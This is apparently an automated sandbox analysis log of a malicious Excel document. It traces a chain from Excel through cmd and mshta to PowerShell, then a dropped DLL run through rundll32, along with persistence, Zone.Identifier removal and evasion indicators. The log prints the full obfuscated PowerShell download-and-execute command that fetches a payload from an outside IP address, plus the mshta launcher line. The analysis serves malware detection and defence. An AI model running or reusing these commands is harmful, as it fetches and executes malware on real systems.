Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w......................4k....x.w.............................}..v............0.................w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............`.4k....................................}..v....0.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#...............`.4k....(.w.............................}..v............0.................w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'.................4k....E...............................}..v............0...............x.w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.................4k....E...............................}..v............0...............x.w............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD509.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_00343C3B CreateToolhelp32Snapshot, 17_2_00343C3B
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: 36E8.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D08CB push 8B490315h; iretd 6_3_034D08D0
Source: C:\Windows\System32\mshta.exe Code function: 6_3_034D00C1 push 8B490315h; iretd 6_3_034D00C7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260A21 push eax; ret 8_2_000007FF00260C51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260655 push eax; ret 8_2_000007FF00260791
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF002620D0 push eax; ret 8_2_000007FF002620D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF002623DD push eax; ret 8_2_000007FF002623F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00261B30 push eax; ret 8_2_000007FF00261B31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260002 push eax; ret 8_2_000007FF00260021
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF00260000 push eax; ret 8_2_000007FF00260001
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FF0026009A push eax; ret 8_2_000007FF002600D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B114C push ds; ret 11_2_002B114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002B15F5 push cs; retf 11_2_002B15FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_008109F5 push cs; retf 12_2_008109FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0081054C push ds; ret 12_2_0081054D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0073114C push ds; ret 12_2_0073114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_007315F5 push cs; retf 12_2_007315FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10032B7D push ecx; ret 13_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10030DFF push ecx; ret 13_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0060114C push ds; ret 13_2_0060114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006015F5 push cs; retf 13_2_006015FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0029114C push ds; ret 14_2_0029114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002915F5 push cs; retf 14_2_002915FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_0027114C push ds; ret 16_2_0027114D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002715F5 push cs; retf 16_2_002715FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0034114C push ds; ret 17_2_0034114D
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 11_2_1003D873
PE file contains an invalid checksum
Source: Milossd.dll.8.dr Static PE information: real checksum: 0x8f55d should be: 0x8973e

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\Milossd.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_100134F0 IsIconic, 13_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 13_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2552 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000C.00000002.509950436.00000000002AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
